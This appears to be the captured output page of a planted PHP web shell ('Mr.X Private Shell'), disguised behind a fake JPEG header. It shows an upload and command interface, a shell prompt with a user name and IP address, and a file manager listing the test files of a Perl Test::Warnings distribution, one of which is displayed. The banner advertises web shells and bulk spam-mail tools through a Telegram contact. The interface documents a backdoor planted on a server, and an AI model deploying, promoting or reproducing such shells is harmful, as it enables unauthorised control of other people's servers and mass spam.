����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
use strict;
use warnings;

# we intended to insert a test at END time whenever:
# - done_testing has not been run,
# - AND ':no_end_test' is not imported,
# - AND EITHER at least one test has been run, OR there was a plan.

# before v0.003, these last two conditions were also ANDed, so we
# never got a test added when we were running tests without a plan
# and terminated without done_testing (such as terminating a forked
# process).

use Test::More 'no_plan';

# define our END block first, so it is run last (after TW's END)
END {
    final_tests();
}

use Test::Warnings;

pass('this is a passing test');

# now we "END"...

sub final_tests
{
    is(
        Test::Builder->new->current_test, 2,
        'two tests have been run (the pass, and our no-warnings-via-END test)',
    );
}


Filemanager

Name Type Size Permission Actions
lib Folder 0770
00-report-prereqs.dd File 10.73 KB 0644
00-report-prereqs.t File 5.95 KB 0644
01-basic.t File 2.19 KB 0600
02-done_testing.t File 763 B 0644
03-subtest.t File 727 B 0644
04-no-tests.t File 493 B 0644
05-no-end-block.t File 503 B 0600
06-skip-all.t File 237 B 0644
07-no_plan.t File 792 B 0644
08-use-if.t File 359 B 0600
09-warnings-contents.t File 1.91 KB 0644
10-no-done_testing.t File 481 B 0600
11-double-use.t File 557 B 0600
12-no-newline.t File 747 B 0640
13-propagate-warnings.t File 909 B 0600
14-propagate-subname.t File 934 B 0600
15-propagate-default.t File 644 B 0600
16-propagate-ignore.t File 641 B 0600
17-propagate-subname-colons.t File 366 B 0600
18-propagate-subname-package.t File 443 B 0600
19-propagate-nonexistent-subname.t File 661 B 0600
20-propagate-stub.t File 287 B 0600
21-fail-on-warning.t File 1.2 KB 0640
22-warnings-bareword.t File 638 B 0600
23-report-warnings.t File 1.03 KB 0640
24-only-report-warnings.t File 805 B 0640
25-allowed_patterns.t File 556 B 0640
26-test2-compat.t File 308 B 0640
27-module-ordering.t File 150 B 0640
28-redefine-done_testing.t File 185 B 0640
zzz-check-breaks.t File 1.14 KB 0644